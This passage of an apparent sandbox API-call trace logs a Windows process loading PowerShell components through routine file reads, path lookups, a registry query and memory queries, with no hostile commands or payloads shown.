[0085.345] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.345] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.346] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.346] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.346] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.346] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.347] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.347] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.347] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.351] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.352] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.352] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.352] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.353] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.353] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.353] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.353] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.354] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.354] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.354] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.354] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.354] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.355] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.355] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.355] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.355] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.357] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.357] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.358] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.358] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.358] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.358] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0085.359] SetErrorMode (uMode=0x1) returned 0x1 [0085.359] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0085.360] SetErrorMode (uMode=0x1) returned 0x1 [0085.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0085.360] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x30c) returned 0x0 [0085.360] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.360] CoTaskMemAlloc (cb=0x5a) returned 0x1c6fb0 [0085.360] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1c6fb0, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.360] CoTaskMemFree (pv=0x1c6fb0) [0085.360] RegCloseKey (hKey=0x30c) returned 0x0 [0085.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0085.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0085.422] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x6ae816e8, Data2=0xb8a5, Data3=0x42d5, Data4=([0]=0xb8, [1]=0x4, [2]=0x1, [3]=0x1e, [4]=0x5a, [5]=0xf9, [6]=0xf9, [7]=0xb8))) returned 0x0 [0085.422] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x67732eb1, Data2=0x2000, Data3=0x4601, Data4=([0]=0x9d, [1]=0xf7, [2]=0xda, [3]=0xb8, [4]=0x4c, [5]=0xaf, [6]=0x5a, [7]=0xa4))) returned 0x0 [0085.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.491] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xf5c4f912, Data2=0x23ea, Data3=0x4647, Data4=([0]=0xa4, [1]=0xd6, [2]=0x20, [3]=0xc6, [4]=0x12, [5]=0xd3, [6]=0xe2, [7]=0xe5))) returned 0x0 [0085.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.494] VirtualQuery (in: lpAddress=0xeb340, lpBuffer=0xec200, dwLength=0x30 | out: lpBuffer=0xec200*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.495] VirtualQuery (in: lpAddress=0xeb3d0, lpBuffer=0xec290, dwLength=0x30 | out: lpBuffer=0xec290*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.496] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.498] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 